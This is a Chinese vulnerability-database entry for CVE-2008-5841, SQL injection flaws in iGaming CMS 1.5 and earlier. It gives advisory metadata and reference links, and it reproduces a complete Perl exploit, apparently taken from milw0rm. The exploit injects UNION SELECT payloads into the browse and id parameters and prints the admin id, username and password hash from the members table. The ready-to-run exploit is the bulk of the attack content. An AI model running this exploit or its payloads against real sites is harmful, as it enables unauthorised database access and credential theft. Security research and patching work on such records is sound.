iGaming CMS多个SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116199 漏洞类型 SQL注入
发布时间 2008-09-23 更新时间 2009-01-05
CVE编号 CVE-2008-5841 CNNVD-ID CNNVD-200901-029
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/6540
https://www.securityfocus.com/bid/80781
https://cxsecurity.com/issue/WLB-2009010123
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-029
|漏洞详情
iGamingCMS是一个内容管理系统,设计为游戏网站。这个系统是用PHP开发和需要的Mysql数据库.。iGaming1.5以及之前的版本存在多个SQL注入漏洞。远程攻击者可以借助对(1)previews.php和(2)reviews.php的浏览参数和对查看文章操作中的index.php的id参数来执行任意的SQL指令。
|漏洞EXP
#!/usr/bin/perl
# ----------------------------------------------------------
# iGaming <= 1.5 Multiple Remote SQL Injection Exploit
# Perl Exploit - Output: id:admin:password
# Discovered On: 23/09/2008
# Discovered By: StAkeR - StAkeR[at]hotmail[dot]it
# Proud To Be Italian 
# ----------------------------------------------------------
# Usage: perl exploit.pl http://localhost/iGaming
# ----------------------------------------------------------

use strict;
use LWP::UserAgent;

my ($one,$two,$exec,$host,$http,$xxx,$view);

$view  = "'%20union%20select%200,0,1,2,concat(0x25,id,0x3a,pseudo,0x3a,pass,0x25),0,6,7,8%20from%20sp_members%20WHERE%20id='1/*";
$exec  = "'%20union%20select%201,concat(0x25,id,0x3a,pseudo,0x3a,pass,0x25),3%20from%20sp_members%20where%20id='1/*";
$host = shift @ARGV;
$http = new LWP::UserAgent or die $!;
$http->agent("Mozilla/4.5 [en] (Win95; U)");
$http->timeout(1);
                          

if($host !~ /^http:\/\/(.+?)$/)
{
  print "[?] iGaming CMS <= 1.5 Multiple Remote SQL Injection Exploit\n";
  print "[?] Usage: perl $0 http://[path]\n";
  exit;
}
else
{
  $one = $http->get($host.'/previews.php?browse='.$exec);
  $two = $http->get($host.'/reviews.php?browse='.$exec);
  $xxx = $http->get($host.'/index.php?do=viewarticle&id='.$view);
  
  if($one->is_success or $two->is_success or $xxx->is_success)
  {
    die "$1\n" if $one->content =~ /%(.+?)%/;
    die "$1\n" if $two->content =~ /%(.+?)%/;
    die "$1\n" if $xxx->content =~ /%(.+?)%/;
  }
  else
  {
    die "[+] Exploit Failed!\n";
  }
}  

# milw0rm.com [2008-09-23]
|受影响的产品
Igamingcms Igaming Cms 1.5 Igamingcms Igaming Cms 1.4.2 Igamingcms Igaming Cms 1.3.1
|参考资料

来源:XF
名称:igamingcms-previews-sql-injection(45366)
链接:http://xforce.iss.net/xforce/xfdb/45366
来源:BID
名称:31340
链接:http://www.securityfocus.com/bid/31340
来源:MILW0RM
名称:6540
链接:http://www.milw0rm.com/exploits/6540
来源:SREASON
名称:4867
链接:http://securityreason.com/securityalert/4867